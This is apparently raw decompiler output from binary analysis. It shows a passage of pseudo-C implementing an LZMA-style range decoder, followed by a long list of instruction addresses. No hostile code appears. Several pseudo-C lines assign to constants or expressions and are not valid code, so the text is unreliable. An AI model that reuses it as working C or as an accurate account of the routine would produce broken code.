												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                      0x00000000
                                                      0x00407395
                                                      0x00407395
                                                      0x00407399
                                                      0x004073be
                                                      0x004073c8
                                                      0x00000000
                                                      0x0040739b
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a8
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00407489
                                                      0x00407489
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x004074c7
                                                      0x004074cb
                                                      0x0040752b
                                                      0x0040752e
                                                      0x00407533
                                                      0x00407534
                                                      0x00407536
                                                      0x00407538
                                                      0x0040753b
                                                      0x00407447
                                                      0x00407447
                                                      0x00407447
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406bec
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x00000000
                                                      0x00406bfd
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c06
                                                      0x00406c09
                                                      0x00406c0c
                                                      0x00406c10
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c16
                                                      0x00406c19
                                                      0x00406c1b
                                                      0x00406c1c
                                                      0x00406c1f
                                                      0x00406c21
                                                      0x00406c22
                                                      0x00406c24
                                                      0x00406c27
                                                      0x00406c2c
                                                      0x00406c31
                                                      0x00406c3a
                                                      0x00406c4d
                                                      0x00406c50
                                                      0x00406c5c
                                                      0x00406c84
                                                      0x00406c86
                                                      0x00406c94
                                                      0x00406c94
                                                      0x00406c98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c88
                                                      0x00406c8b
                                                      0x00406c8c
                                                      0x00406c8c
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c62
                                                      0x00406c67
                                                      0x00406c67
                                                      0x00406c70
                                                      0x00406c78
                                                      0x00406c7b
                                                      0x00000000
                                                      0x00406c81
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c9e
                                                      0x00406c9e
                                                      0x00406ca2
                                                      0x0040754e
                                                      0x00000000
                                                      0x0040754e
                                                      0x00406cab
                                                      0x00406cbb
                                                      0x00406cbe
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc4
                                                      0x00406cc8
                                                      0x00000000
                                                      0x00000000
                                                      0x00406cca
                                                      0x00406cd0
                                                      0x00406cfa
                                                      0x00406d00
                                                      0x00406d07
                                                      0x00000000
                                                      0x00406d07
                                                      0x00406cd6
                                                      0x00406cd9
                                                      0x00406cde
                                                      0x00406cde
                                                      0x00406ce9
                                                      0x00406cf1
                                                      0x00406cf4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d39
                                                      0x00406d3f
                                                      0x00406d42
                                                      0x00406d4f
                                                      0x00406d57
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d0e
                                                      0x00406d0e
                                                      0x00406d12
                                                      0x0040755d
                                                      0x00000000
                                                      0x0040755d
                                                      0x00406d1e
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d2c
                                                      0x00406d2f
                                                      0x00406d32
                                                      0x00406d37
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073d4
                                                      0x004073da
                                                      0x004073e0
                                                      0x004073fa
                                                      0x004073fd
                                                      0x00407403
                                                      0x0040740e
                                                      0x0040740e
                                                      0x00407410
                                                      0x004073e2
                                                      0x004073e2
                                                      0x004073f1
                                                      0x004073f5
                                                      0x004073f5
                                                      0x0040741a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040741c
                                                      0x00407420
                                                      0x004075cf
                                                      0x00000000
                                                      0x004075cf
                                                      0x0040742c
                                                      0x00407433
                                                      0x0040743b
                                                      0x0040743e
                                                      0x00407441
                                                      0x00407441
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d5f
                                                      0x00406d61
                                                      0x00406d64
                                                      0x00406dd5
                                                      0x00406dd8
                                                      0x00406ddb
                                                      0x00406de2
                                                      0x00406dec
                                                      0x00000000
                                                      0x00406dec
                                                      0x00406d66
                                                      0x00406d6a
                                                      0x00406d6d
                                                      0x00406d6f
                                                      0x00406d72
                                                      0x00406d75
                                                      0x00406d77
                                                      0x00406d7a
                                                      0x00406d7c
                                                      0x00406d81
                                                      0x00406d84
                                                      0x00406d87
                                                      0x00406d8b
                                                      0x00406d92
                                                      0x00406d95
                                                      0x00406d9c
                                                      0x00406da0
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406dac
                                                      0x00406daf
                                                      0x00406dcd
                                                      0x00406dcf
                                                      0x00000000
                                                      0x00406db1
                                                      0x00406db1
                                                      0x00406db4
                                                      0x00406db7
                                                      0x00406dba
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbf
                                                      0x00406dc2
                                                      0x00406dc4
                                                      0x00406dc5
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00406ffe
                                                      0x00407002
                                                      0x00407020
                                                      0x00407023
                                                      0x0040702a
                                                      0x0040702d
                                                      0x00407030
                                                      0x00407033
                                                      0x00407036
                                                      0x00407039
                                                      0x0040703b
                                                      0x00407042
                                                      0x00407043
                                                      0x00407045
                                                      0x00407048
                                                      0x0040704b
                                                      0x0040704e
                                                      0x0040704e
                                                      0x00407053
                                                      0x00000000
                                                      0x00407053
                                                      0x00407004
                                                      0x00407007
                                                      0x0040700a
                                                      0x00407014
                                                      0x00000000
                                                      0x00000000
                                                      0x00407068
                                                      0x0040706c
                                                      0x0040708f
                                                      0x00407092
                                                      0x00407095
                                                      0x0040709f
                                                      0x0040706e
                                                      0x0040706e
                                                      0x00407071
                                                      0x00407074
                                                      0x00407077
                                                      0x00407084
                                                      0x00407087
                                                      0x00407087
                                                      0x00000000
                                                      0x00000000
                                                      0x004070ab
                                                      0x004070af
                                                      0x00000000
                                                      0x00000000
                                                      0x004070b5
                                                      0x004070b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004070bf
                                                      0x004070c1
                                                      0x004070c5
                                                      0x004070c5
                                                      0x004070c8
                                                      0x004070cc
                                                      0x00000000
                                                      0x00000000
                                                      0x0040711c
                                                      0x00407120
                                                      0x00407127
                                                      0x0040712a
                                                      0x0040712d
                                                      0x00407137
                                                      0x00000000
                                                      0x00407137
                                                      0x00407122
                                                      0x00000000
                                                      0x00000000
                                                      0x00407143
                                                      0x00407147
                                                      0x0040714e
                                                      0x00407151
                                                      0x00407154
                                                      0x00407149
                                                      0x00407149
                                                      0x00407149
                                                      0x00407157
                                                      0x0040715a
                                                      0x0040715d
                                                      0x0040715d
                                                      0x00407160
                                                      0x00407163
                                                      0x00407166
                                                      0x00407166
                                                      0x00407169
                                                      0x00407170
                                                      0x00407175
                                                      0x00000000
                                                      0x00000000
                                                      0x00407203
                                                      0x00407203
                                                      0x00407207
                                                      0x004075a5
                                                      0x00000000
                                                      0x004075a5
                                                      0x0040720d
                                                      0x00407210
                                                      0x00407213
                                                      0x00407217
                                                      0x0040721a
                                                      0x00407220
                                                      0x00407222
                                                      0x00407222
                                                      0x00407222
                                                      0x00407225
                                                      0x00407228
                                                      0x00000000
                                                      0x00000000
                                                      0x00406df8
                                                      0x00406df8
                                                      0x00406dfc
                                                      0x00407569
                                                      0x00000000
                                                      0x00407569
                                                      0x00406e02
                                                      0x00406e05
                                                      0x00406e08
                                                      0x00406e0c
                                                      0x00406e0f
                                                      0x00406e15
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e1a
                                                      0x00406e1d
                                                      0x00406e1d
                                                      0x00406e20
                                                      0x00406e23
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e29
                                                      0x00406e2f
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e35
                                                      0x00406e35
                                                      0x00406e39
                                                      0x00406e3c
                                                      0x00406e3f
                                                      0x00406e42
                                                      0x00406e45
                                                      0x00406e46
                                                      0x00406e49
                                                      0x00406e4b
                                                      0x00406e51
                                                      0x00406e54
                                                      0x00406e57
                                                      0x00406e5a
                                                      0x00406e5d
                                                      0x00406e60
                                                      0x00406e63
                                                      0x00406e7f
                                                      0x00406e82
                                                      0x00406e85
                                                      0x00406e88
                                                      0x00406e8f
                                                      0x00406e93
                                                      0x00406e95
                                                      0x00406e99
                                                      0x00406e65
                                                      0x00406e65
                                                      0x00406e69
                                                      0x00406e71
                                                      0x00406e76
                                                      0x00406e78
                                                      0x00406e7a
                                                      0x00406e7a
                                                      0x00406e9c
                                                      0x00406ea3
                                                      0x00406ea6
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eb1
                                                      0x00406eb1
                                                      0x00406eb5
                                                      0x00407575
                                                      0x00000000
                                                      0x00407575
                                                      0x00406ebb
                                                      0x00406ebe
                                                      0x00406ec1
                                                      0x00406ec5
                                                      0x00406ec8
                                                      0x00406ece
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed3
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ede
                                                      0x00406ee1
                                                      0x00406ee4
                                                      0x00406ee7
                                                      0x00406eea
                                                      0x00406eed
                                                      0x00406ef0
                                                      0x00406ef3
                                                      0x00406ef6
                                                      0x00406ef9
                                                      0x00406efc
                                                      0x00406f14
                                                      0x00406f17
                                                      0x00406f1a
                                                      0x00406f1d
                                                      0x00406f1d
                                                      0x00406f20
                                                      0x00406f24
                                                      0x00406f26
                                                      0x00406efe
                                                      0x00406efe
                                                      0x00406f06
                                                      0x00406f0b
                                                      0x00406f0d
                                                      0x00406f0f
                                                      0x00406f0f
                                                      0x00406f29
                                                      0x00406f30
                                                      0x00406f33
                                                      0x00000000
                                                      0x00406f35
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f33
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f75
                                                      0x00406f75
                                                      0x00406f79
                                                      0x00407581
                                                      0x00000000
                                                      0x00407581
                                                      0x00406f7f
                                                      0x00406f82
                                                      0x00406f85
                                                      0x00406f89
                                                      0x00406f8c
                                                      0x00406f92
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f97
                                                      0x00406f9a
                                                      0x00406f9a
                                                      0x00406fa0
                                                      0x00406f3e
                                                      0x00406f3e
                                                      0x00406f41
                                                      0x00000000
                                                      0x00406f41
                                                      0x00406fa2
                                                      0x00406fa2
                                                      0x00406fa5
                                                      0x00406fa8
                                                      0x00406fab
                                                      0x00406fae
                                                      0x00406fb1
                                                      0x00406fb4
                                                      0x00406fb7
                                                      0x00406fba
                                                      0x00406fbd
                                                      0x00406fc0
                                                      0x00406fd8
                                                      0x00406fdb
                                                      0x00406fde
                                                      0x00406fe1
                                                      0x00406fe1
                                                      0x00406fe4
                                                      0x00406fe8
                                                      0x00406fea
                                                      0x00406fc2
                                                      0x00406fc2
                                                      0x00406fca
                                                      0x00406fcf
                                                      0x00406fd1
                                                      0x00406fd3
                                                      0x00406fd3
                                                      0x00406fed
                                                      0x00406ff4
                                                      0x00406ff7
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407056
                                                      0x00407056
                                                      0x00407059
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00000000
                                                      0x00407482
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
